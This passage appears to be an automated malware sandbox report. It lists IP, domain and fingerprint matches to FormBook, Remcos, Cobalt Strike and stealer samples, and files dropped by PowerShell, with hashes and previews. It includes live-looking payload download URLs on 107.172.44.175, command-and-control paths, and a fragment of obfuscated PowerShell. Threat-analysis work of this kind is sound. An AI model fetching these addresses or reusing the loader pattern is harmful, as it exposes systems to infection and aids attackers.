                                                                                07:09:58API Interceptor15x Sleep call for process: msinfo32.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                151.101.129.137nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                  https://0azeevmdi7.codedesign.app/Get hashmaliciousUnknownBrowse
                                                                                    http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                      Steelcase Series 1 Sustainable Office Chair _ Steelcase.htmlGet hashmaliciousUnknownBrowse
                                                                                        https://jenifer-lopezz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                          https://bookme.name/simonmed/usGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                            https://asset.cloudinary.com/dclug8dsh/490e37baf41d2124fee1d1d5aeaf2423Get hashmaliciousHTMLPhisherBrowse
                                                                                              https://ipfs.io/ipfs/QmWNYr2ZzUpnCe5o76MxsXMmnPtnt9FdDo7zmRz6FaMzeu#hresource@archphila.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                                                  https://searchunify.comGet hashmaliciousUnknownBrowse
                                                                                                    107.172.44.175Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 107.172.44.175/1321/CAMRM.txt
                                                                                                    Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 107.172.44.175/1311/we/seethebestthingsgoodforentireattitudewhoputonmyheartsheismysweetbebay.hta
                                                                                                    Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    • 107.172.44.175/31/RFVGG.txt
                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    • 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    • 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
                                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    • 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
                                                                                                    199.59.243.227SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.whisperart.net/27s6/
                                                                                                    Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
                                                                                                    1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.honk.city/c8xp/
                                                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.bcg.services/xz45/
                                                                                                    W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.acond-22-mvr.click/w9z4/
                                                                                                    FATURA.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.timetime.store/wxr5/
                                                                                                    Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.acond-22-mvr.click/w9z4/
                                                                                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.honk.city/c8xp/
                                                                                                    DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.oztalkshw.store/3agz/
                                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.whisperart.net/rfcw/

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    cloudinary.map.fastly.netnicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                    • 151.101.129.137
                                                                                                    #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                    • 151.101.1.137
                                                                                                    nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                    • 151.101.1.137
                                                                                                    https://0azeevmdi7.codedesign.app/Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137
                                                                                                    LBzGgy6rnu.docGet hashmaliciousRemcosBrowse
                                                                                                    • 151.101.65.137
                                                                                                    0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                    • 151.101.65.137
                                                                                                    1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                    • 151.101.1.137
                                                                                                    http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137
                                                                                                    Steelcase Series 1 Sustainable Office Chair _ Steelcase.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137
                                                                                                    https://jenifer-lopezz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    FASTLYUShttp://johnlewis.siteGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.65.229
                                                                                                    nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                    • 151.101.129.137
                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    • 151.101.129.91
                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    • 151.101.193.91
                                                                                                    https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=oSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-73L43097YS920471H%2FU-21916088VG929353V%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3DoSTQ2KyhBfzKABJBD3SmDi49NoivW60lzQASFQ%22%7D%7D&flowContextData=RDl_AZcF1sl5Rb_6LCOad8Ablnu-W7AxB_i5FzkmY9ljbd6ElIlIteG0y31awgymrSFY-NEhR9oodKgi2Jr_54nHRHUI22A5btXBAz58pUBlVy_icxhdiCyvbxtKkJbyvPwAFXZm9Hu-TuP8fUbi3kD9SI3uQE-nXU-1T6hk9yNEcfLwmQ9q2oXw0Nu89DKUwRZZ-hEgdjZhl4tqKDQiASbkdXigxUyjHWAPt-vOaJzbzisp0scQXF4UF-J1Rto6RYCxskkLambqbUPNkjVq_ZtnTRrfcOFs6AdzgjQZxFjLXCq1M3EW1Aiq9DSZcmtteoSiOkL-Yl_4s2YOFo6jNRRQrcEHNylGYTBCyHc65n4_85NWbx-ikEWoVlI4LXcJW4dftTovp8EWo5xXhEORiceFOjZRVbk5MVtSKHu91b7gPLC3F3USPVAc68XpKKXL_xvsUAp1wPS1patgsMBTMQo3Gwa68P9HfAfTWEjlQ1Yf3yTIWtRpNF8qyyGgAUBLgrJVAT_OmXFJJrX08CV-vxGPkepVr0r1FVRxwTmimvKh55xYEKkfPK5XJKmenbfgUa9CbfH9d_FpW5yVigO-oMpueUaWL8bSCYMeFYr8B1GfpUn9ASsdqnfnFqtpUGY0Y4MI9f0bvAFH6gYvW7ZTeYh_jKu&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=c038b022-b182-11ef-83cc-0118134ab4bf&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=c038b022-b182-11ef-83cc-0118134ab4bf&calc=f826437c02759&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signinGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.193.21
                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    • 151.101.129.91
                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    • 151.101.193.91
                                                                                                    https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.2.137
                                                                                                    #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                    • 151.101.1.137
                                                                                                    https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cecGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.194.208
                                                                                                    CLOUDFLARENETUShttp://johnlewis.siteGet hashmaliciousUnknownBrowse
                                                                                                    • 162.159.140.98
                                                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 104.21.57.248
                                                                                                    fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.67.152
                                                                                                    https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                                                    • 162.159.61.3
                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.16.9
                                                                                                    Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.33.143
                                                                                                    Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).batGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.36.187
                                                                                                    fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.6
                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.16.9
                                                                                                    letter_olivia.law_mercerhole.co.uk.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 172.67.149.151

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0enicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                    • 151.101.129.137
                                                                                                    nicetomeetyougreatthignsgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                    • 151.101.129.137
                                                                                                    fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 151.101.129.137
                                                                                                    Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).batGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137
                                                                                                    Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                    • 151.101.129.137
                                                                                                    Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • 151.101.129.137
                                                                                                    lnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                    • 151.101.129.137
                                                                                                    lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                    • 151.101.129.137
                                                                                                    https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137
                                                                                                    Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.137

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nightridingisreallyniceforworkingskillentiretimefornew[1].tiff

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (3266), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):154108
                                                                                                    Entropy (8bit):3.80902206387575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Y53KPX3LVRMFTHvqq53KPX3LVRMF153KPX3LVRMF6:lPLVGFqPLVGFWPLVGF6
                                                                                                    MD5:714404045E7841CEBE0302E177C6CD3D
                                                                                                    SHA1:22EFC9796C48BA9527219AB6118E71D1CD9DA729
                                                                                                    SHA-256:EF6B11FE955BC7F2064CAD480851792FC6E9625325B32480252300BE1FEBA8DE
                                                                                                    SHA-512:D30E94AEFD53EAECB533AFC02E104370B93FBFD8767ECE8B663AF7F48E312EC37AB4C99243CC3A1995D4B2C5B08DA780DE0EA85BB041EA85F9C33B6039C97133
                                                                                                    Malicious:false
                                                                                                    Preview:...... . . . .....L.L.k.b.p.i.l.u.b.L.v.f.A.b.K. .=. .".K.c.a.i.s.I.I.o.A.P.L.d.B.K.i.".....N.G.Z.K.J.L.K.W.K.q.N.t.i.U.G. .=. .".L.Z.A.z.R.b.A.Z.x.c.K.f.b.i.Z.".....b.g.A.A.P.i.W.K.h.I.f.G.L.P.G. .=. .".t.p.m.r.i.o.c.k.W.C.d.i.l.U.I.".........W.n.q.k.f.L.B.L.i.A.s.o.S.z.W. .=. .".N.o.O.N.P.q.K.L.O.G.d.h.W.c.n.".....k.m.p.L.R.i.m.s.r.m.K.k.P.p.Z. .=. .".Q.W.u.Z.m.c.Z.i.q.K.B.x.c.s.k.".....o.T.i.c.b.L.L.B.N.i.i.U.i.A.N. .=. .".f.i.e.l.p.d.k.z.a.j.j.i.l.i.W.".....L.W.G.R.N.p.W.L.c.Z.f.G.K.J.h. .=. .".L.G.f.T.K.C.Z.v.N.L.A.e.b.L.b.".....r.L.C.L.q.d.G.g.L.K.u.W.K.n.o. .=. .".s.H.K.i.C.c.W.U.c.C.A.k.W.O.m.".....m.p.f.d.c.J.f.U.j.I.g.U.W.e.o. .=. .".i.p.o.c.U.p.S.k.e.i.t.l.c.W.k.".....r.K.d.u.G.S.q.p.H.K.L.O.Z.l.U. .=. .".I.L.G.b.o.h.G.K.Z.W.L.p.f.O.i.".....G.g.h.m.H.u.a.m.H.k.a.C.G.p.d. .=. .".m.p.U.h.z.i.i.i.Z.R.W.W.p.c.P.".....N.B.Z.Z.K.z.m.P.i.L.k.L.d.G.L. .=. .".f.a.o.R.i.i.Z.N.W.W.h.d.G.Q.C.".....C.j.v.Z.L.L.K.n.f.P.f.t.o.G.b. .=. .".L.N.O.P.A.f.h.W.p.m.n.g.K.h.h.".....O.Z.h.f.S.f.e.x.

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5829
                                                                                                    Entropy (8bit):4.901113710259376
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1172
                                                                                                    Entropy (8bit):5.344931650926746
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3ak0bgSKco4KmBs4RPT6BmFoUvjKTIKo+mZ9t7J0gt/NKEr8HiD:qvgSU4y4RQmFoULF+mZ9tK8Nz7D
                                                                                                    MD5:5B8E4FF364793DD3EAC7C2C65918EB4C
                                                                                                    SHA1:F790A9D0E73499F0BA35A832FADB30944CBCEC5D
                                                                                                    SHA-256:69D8CB8B695D997BB12AAF6D03318000B7194DD6D9FDAF60187604E5C35BC2AC
                                                                                                    SHA-512:18167D9D6BB8E105E748347567E41E48A916DCA622B069717FE79B8F76C30236721DB10E7B72AE18B3AF2893DF06C8609B552209552E0301E543A8C8078A061F
                                                                                                    Malicious:false
                                                                                                    Preview:@...e.................................^..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                    C:\Users\user\AppData\Local\Temp\6311_I4d42

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196608
                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\RES66CD.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Dec 4 13:20:34 2024, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1336
                                                                                                    Entropy (8bit):3.981027410773278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:H+m9IiJocF9/4xH+wKTF9mfwI+ycuZhNgakSMPNnqSSd:wiXFY9KTfmo1ulga3cqSC
                                                                                                    MD5:65C02123FB906BC6A2D3877E81C48ED4
                                                                                                    SHA1:733486E4A2D9C6ECE4B48039464843A38DA4B451
                                                                                                    SHA-256:8AF7BF63232A13EA39DC55D44DE4E953A8BC375822A19A1D398AF7908F1E9B06
                                                                                                    SHA-512:F42EF343844A0B516C6B570BD2751C746A6FD4E045F7A950A7189AEDC354AC40D85C66C9F762E141EE7DE4B8F2C41C8F72517DF24558092F5C64025D661AF018
                                                                                                    Malicious:false
                                                                                                    Preview:L..."WPg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP..................+L.M....P.....3...........5.......C:\Users\user\AppData\Local\Temp\RES66CD.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.o.j.0.p.n.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cpnolif.g5x.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpoyaalp.otw.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kclonvwr.jlm.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t51eiwuj.b1a.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujoxousr.3r0.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
